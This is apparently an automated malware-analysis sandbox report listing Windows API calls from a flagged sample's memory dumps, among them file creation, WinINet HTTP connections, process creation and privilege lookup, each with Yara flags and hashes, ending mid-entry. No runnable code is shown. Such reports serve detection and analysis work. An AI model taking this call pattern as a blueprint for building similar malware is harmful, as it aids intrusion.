                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID: !:
                                                                    • API String ID: 2738559852-3508929463
                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction ID: ef5d808fa01b8a3e6ab060428a3c462b4f9a5b015c5680b7dd776dc71dfc9305
                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction Fuzzy Hash: 3DF0A9B2200108ABCB14DF89DC91DEB77ADAF8C754F158649BA1DA7241D630E811CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00EB3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00EB3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00EB821D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: .z`
                                                                    • API String ID: 823142352-1441809116
                                                                    • Opcode ID: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
                                                                    • Instruction ID: cde6725c54a4f1bbcb5456a2b9e375852de2fe3aacdfc074df5ba7f6955bf934
                                                                    • Opcode Fuzzy Hash: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
                                                                    • Instruction Fuzzy Hash: 1AF0F8B2218148AF8B44CF9CDD94CEB77ADEB8C210B14465CFA5CC7204C631E802CB64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtClose.NTDLL(@=,?,?,00EB3D40,00000000,FFFFFFFF), ref: 00EB8325
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID: @=
                                                                    • API String ID: 3535843008-3903022579
                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction ID: 228046cde00c5c8e81c18b21d55d99a603d02f751b8435abf707da3dfd209b9c
                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction Fuzzy Hash: 8AD012752002186BD710EF98CC45ED7779CEF44750F154455BA186B242C570F90087E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d308abbccc8082690383181202e199ad8599393d5f06e49ecf2218ab17c32a4d
                                                                    • Instruction ID: f5b0738974077e5bdaf4c4133d27fd429737c629ccabac1e1f8bf963c7ac1a51
                                                                    • Opcode Fuzzy Hash: d308abbccc8082690383181202e199ad8599393d5f06e49ecf2218ab17c32a4d
                                                                    • Instruction Fuzzy Hash: 4C90027120104802D104A9D9540A647000997E1341F51D111A5014559ED7E588917171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 54d79841d62e1b959c1079ca7d21f1980ab95dd106cb9d76ad706751115cee11
                                                                    • Instruction ID: a42b2735cb45d8b57a17b8b94435c40de4812eba5082c41cb31ea39cf588abf7
                                                                    • Opcode Fuzzy Hash: 54d79841d62e1b959c1079ca7d21f1980ab95dd106cb9d76ad706751115cee11
                                                                    • Instruction Fuzzy Hash: EE90027131118802D114A5998406707000997D2241F51C511A081455CD97D588917162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: e95b157e8aeeeee202f7a17b52488fde01a80e5b58585181e510959a346fd982
                                                                    • Instruction ID: 99c44fa3b258e00a3904f6fa37713fd13edcb66b4079674562ad46da25eaf0e6
                                                                    • Opcode Fuzzy Hash: e95b157e8aeeeee202f7a17b52488fde01a80e5b58585181e510959a346fd982
                                                                    • Instruction Fuzzy Hash: 7590026921304402D184B599540A60B000997D2242F91D515A000555CCDA9588696361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4b6349b543ef93046f0ae276e81663ed46ba325e97f9662a276f74df5cd26f28
                                                                    • Instruction ID: 45ee007318bec206130948ba35f635692d89a65042647d7904906906655f3a20
                                                                    • Opcode Fuzzy Hash: 4b6349b543ef93046f0ae276e81663ed46ba325e97f9662a276f74df5cd26f28
                                                                    • Instruction Fuzzy Hash: BD90026121184442D204A9A94C16B07000997D1343F51C215A0144558CDA9588616561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 5682033dc7b26de448b62d2957b11c37a6b799f44734c8dea898227d38a4e6b1
                                                                    • Instruction ID: 9d49686cabed0a13f37207e337f4fc60a7b2229a334fafa2ea822e0f37a1a34f
                                                                    • Opcode Fuzzy Hash: 5682033dc7b26de448b62d2957b11c37a6b799f44734c8dea898227d38a4e6b1
                                                                    • Instruction Fuzzy Hash: 8E90027120104C42D104A5994406B47000997E1341F51C116A0114658D9795C8517561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0e7f0c0f7e665219d0f1ea849bd3ce4d4d0a1762f56469f99ff9a6f2f88790b4
                                                                    • Instruction ID: 947f6a9e29710d192f0465cfb61515be3898d317bf2aacb0250ec1de966b116f
                                                                    • Opcode Fuzzy Hash: 0e7f0c0f7e665219d0f1ea849bd3ce4d4d0a1762f56469f99ff9a6f2f88790b4
                                                                    • Instruction Fuzzy Hash: 2D9002712010CC02D114A599840674B000997D1341F55C511A441465CD97D588917161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9f3a7180835927b52614f110651406f2a15ffb6d0f7a14358c76e5d244dd70a8
                                                                    • Instruction ID: 7856f1a8c0c7ea34397b07257fdb9aa795fb8203f07a51e8b0ed61bdb3839291
                                                                    • Opcode Fuzzy Hash: 9f3a7180835927b52614f110651406f2a15ffb6d0f7a14358c76e5d244dd70a8
                                                                    • Instruction Fuzzy Hash: C7900265211044030109E9990706507004A97D6391351C121F1005554CE7A188616161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: af31912b3b0d9b121493298ebdb31b407f26b266273eff3f903ef0c41350e62d
                                                                    • Instruction ID: 76b1389b39f304b9b244ff6685bf9d8305ecbb529c9049ddc535bc7df776a3c7
                                                                    • Opcode Fuzzy Hash: af31912b3b0d9b121493298ebdb31b407f26b266273eff3f903ef0c41350e62d
                                                                    • Instruction Fuzzy Hash: C49002B120104802D144B5994406747000997D1341F51C111A5054558E97D98DD576A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 589a5204df750aec20614088bc840e4a2e549613cdc3b5b3a68c88e1836ed9e4
                                                                    • Instruction ID: dc831b94d98078be375df6e1fed293f45be76193b86cefce99af9d9c5ed79b43
                                                                    • Opcode Fuzzy Hash: 589a5204df750aec20614088bc840e4a2e549613cdc3b5b3a68c88e1836ed9e4
                                                                    • Instruction Fuzzy Hash: D09002A1202044034109B5994416617400E97E1241B51C121E1004594DD6A588917165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: af52529fee85bc86d8b74b5d211ff469a7eaa58a171f291510b65461ed98dd9d
                                                                    • Instruction ID: a54a75bdc133fb2ea31cb890fa3c70c93f969f38ddd0ddf1c0886357f56a882f
                                                                    • Opcode Fuzzy Hash: af52529fee85bc86d8b74b5d211ff469a7eaa58a171f291510b65461ed98dd9d
                                                                    • Instruction Fuzzy Hash: 339002A134104842D104A5994416B070009D7E2341F51C115E1054558D9799CC527166
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: cbbeb54308fc3539cf415ea9728a37a76cbf3c70827e30dbe58ef511cd14ce51
                                                                    • Instruction ID: 22988dbe1d0ae16f11b918eb011dc8c9945ca05bf2d631d377ae3913c14c2858
                                                                    • Opcode Fuzzy Hash: cbbeb54308fc3539cf415ea9728a37a76cbf3c70827e30dbe58ef511cd14ce51
                                                                    • Instruction Fuzzy Hash: 5F900261242085525549F5994406507400AA7E1281791C112A1404954C96A69856E661
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1d235d4b44273a64b881f3c0d6d652d398915d4518e48260d6e4a0f6bec716ba
                                                                    • Instruction ID: 6a62ddb98ffe1c04152555582b79ab557de7d29851853f19ee04d530aa2e699c
                                                                    • Opcode Fuzzy Hash: 1d235d4b44273a64b881f3c0d6d652d398915d4518e48260d6e4a0f6bec716ba
                                                                    • Instruction Fuzzy Hash: 0190027120104813D115A5994506707000D97D1281F91C512A041455CDA7D68952B161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00EB89BC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HttpRequestSend
                                                                    • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                    • API String ID: 360639707-2503632690
                                                                    • Opcode ID: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
                                                                    • Instruction ID: 987ebac90ea46adbbae4b123ffb106341fff160d091b46fa7f985674fa72b8a2
                                                                    • Opcode Fuzzy Hash: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
                                                                    • Instruction Fuzzy Hash: 52012CB2905118ABCB00DF98D9419EF7BBCEB44210F148189FD08A7304D670EE10CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00EB89BC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HttpRequestSend
                                                                    • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                    • API String ID: 360639707-2503632690
                                                                    • Opcode ID: 52ec391f935f9c8049ac92e2fdc19b40a65e0e5907f68e2ea4f78e7a0c382f7a
                                                                    • Instruction ID: d5ed20e392605981df6f0ba2195b4d42a830d88909ca23608ba4862fc096abcf
                                                                    • Opcode Fuzzy Hash: 52ec391f935f9c8049ac92e2fdc19b40a65e0e5907f68e2ea4f78e7a0c382f7a
                                                                    • Instruction Fuzzy Hash: E1012CB1909219AFCB04DF88C941AAFBBB9EB54250F158148FD1967305C631AA10CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00EB88C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ConnectInternet
                                                                    • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                    • API String ID: 3050416762-1024195942
                                                                    • Opcode ID: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
                                                                    • Instruction ID: 6fa86b37900f4db3d8b6eb7923b3a1b76cda03872e2efbaa885355350f0b885a
                                                                    • Opcode Fuzzy Hash: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
                                                                    • Instruction Fuzzy Hash: 9101D7B2905118AFCB14DF99D941EEF77B9EB48310F158289BE08A7241D670EE10CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00EB88C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ConnectInternet
                                                                    • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                    • API String ID: 3050416762-1024195942
                                                                    • Opcode ID: 1beb60638bdf1ca002ce1c8661f89acbec1017934f71d690f4d2ae87c7772c7b
                                                                    • Instruction ID: 9494ca0aa1e181786fb7d6b5b051e5082b777035914419b4f254ae90e07d56bd
                                                                    • Opcode Fuzzy Hash: 1beb60638bdf1ca002ce1c8661f89acbec1017934f71d690f4d2ae87c7772c7b
                                                                    • Instruction Fuzzy Hash: 6B011BB2905159AFDB14DF98D981AEF7BB9FB48304F558188FA08A7301D670EE10CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00EB8847
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InternetOpen
                                                                    • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                    • API String ID: 2038078732-3155091674
                                                                    • Opcode ID: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
                                                                    • Instruction ID: 306f0884d5251424c98adb1e14cc9ab07123771c4044608d48beda2f103b9811
                                                                    • Opcode Fuzzy Hash: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
                                                                    • Instruction Fuzzy Hash: 00F019B2901118AF8B14DF98DD419EBB7BCEF48310B048589FE18A7301D630AE10CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00EB8847
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InternetOpen
                                                                    • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                    • API String ID: 2038078732-3155091674
                                                                    • Opcode ID: b4c08f814941fb355689835392012b3b826060c1c1b5934cdd6bdc96885dda63
                                                                    • Instruction ID: b85bbedb282ca024a18396df6272da9db793cd555be703166033cf28227c164e
                                                                    • Opcode Fuzzy Hash: b4c08f814941fb355689835392012b3b826060c1c1b5934cdd6bdc96885dda63
                                                                    • Instruction Fuzzy Hash: 8EF019B2901128AF8B14DF98DD419EB7BB8FF48310B048549FE18AB341D630AA10CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 00EB6F98
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: net.dll$wininet.dll
                                                                    • API String ID: 3472027048-1269752229
                                                                    • Opcode ID: ca684bb6b441481cdeb2505573588d7da1f275b13871b238975509ddfd0ead1e
                                                                    • Instruction ID: 02e20631e55eacd06155f69f364c558f816d0e3763ebdb8970f0420fad6c87f2
                                                                    • Opcode Fuzzy Hash: ca684bb6b441481cdeb2505573588d7da1f275b13871b238975509ddfd0ead1e
                                                                    • Instruction Fuzzy Hash: 0A318DB1602704ABC711DF68D8A1FA7B7F8AB88700F00841DF65AAB241D734B545CBE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 00EB6F98
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: net.dll$wininet.dll
                                                                    • API String ID: 3472027048-1269752229
                                                                    • Opcode ID: 93471717a2f820b97beefaab349c8c1bda4cc2189cddc55b2d344e3622efbe1f
                                                                    • Instruction ID: 99130bdf0dc8d804a58980768834f32728a666d7c8306fc101f8e84c5d82bfb1
                                                                    • Opcode Fuzzy Hash: 93471717a2f820b97beefaab349c8c1bda4cc2189cddc55b2d344e3622efbe1f
                                                                    • Instruction Fuzzy Hash: B221ACB1601704ABD711DF64C8A1BABB7F5BB88700F04802DF619AB281D374B445CBE5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00EA3B93), ref: 00EB850D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID: .z`
                                                                    • API String ID: 3298025750-1441809116
                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                    • Instruction ID: 4da9fa208b2031221ed3324d645754f8f51144ae0a3bcdcd0e16b57fc17dcef3
                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                    • Instruction Fuzzy Hash: 72E01AB12002086BD714DF59CC45EA777ACAF88750F014555B90867241C630E910CAB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00EA3B93), ref: 00EB850D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID: .z`
                                                                    • API String ID: 3298025750-1441809116
                                                                    • Opcode ID: e641709b8896f5aac4485ac3c5df57708f99eaa19733368f4537f06727c84e07
                                                                    • Instruction ID: bb24e26b6379bf5d8ef48b60dfa773e0e6d01384c8cb7751f49d98cf7c37dd07
                                                                    • Opcode Fuzzy Hash: e641709b8896f5aac4485ac3c5df57708f99eaa19733368f4537f06727c84e07
                                                                    • Instruction Fuzzy Hash: 8FE068AC2042840BDB00EE28E4A08E737C9FF84314710990AEC8983303C134C8068BB1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00EA72CA
                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00EA72EB
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: f787fd5115f45e17e8f96a40551e57a19faf030edf4e6bc80d94188a7898c0a9
                                                                    • Instruction ID: 422cfdd14282c10e098f992c7756a2026667d6247c380a5c523c249d7c265cb8
                                                                    • Opcode Fuzzy Hash: f787fd5115f45e17e8f96a40551e57a19faf030edf4e6bc80d94188a7898c0a9
                                                                    • Instruction Fuzzy Hash: 8C018F71A8022877EB20A6949C03FFF77AC5B45B51F150519FF04BA1C2E6A47A0686F6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00EA9BA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction ID: 05b55de570e43bafc7930ea4c8a25c5269de4529c42b30d41ba49ec367cc2c3f
                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction Fuzzy Hash: DD0112B5D0010DBBDF10DAE4DC42FDEB7B89B54308F0441A5E919AB142F671EB14C791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,00EACFB2,00EACFB2,?,00000000,?,?), ref: 00EB8670
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: b95dca177bc3e0b334d8870d58869377c2e54386ebba5061efa66b41deb5e64a
                                                                    • Instruction ID: cf67efed6ef640091a23ba453916de9b9356b56577fb8613908b96d7c326411f
                                                                    • Opcode Fuzzy Hash: b95dca177bc3e0b334d8870d58869377c2e54386ebba5061efa66b41deb5e64a
                                                                    • Instruction Fuzzy Hash: 5F01A2B22042446FDB24DF64CC89EEB7BACEF84310F144599F98D67342C930E811C7A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00EB85A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: 8967850bb2fc1f34c19b83c00b9e08fe12e6c6e2fedc569ce408f917b69c990d
                                                                    • Instruction ID: d98918d8a576ffce2a0ef1dfae7ffbaf879e6db77e70eb55a6b3d5feb3f5ac82
                                                                    • Opcode Fuzzy Hash: 8967850bb2fc1f34c19b83c00b9e08fe12e6c6e2fedc569ce408f917b69c990d
                                                                    • Instruction Fuzzy Hash: FA019DB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00EB85A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
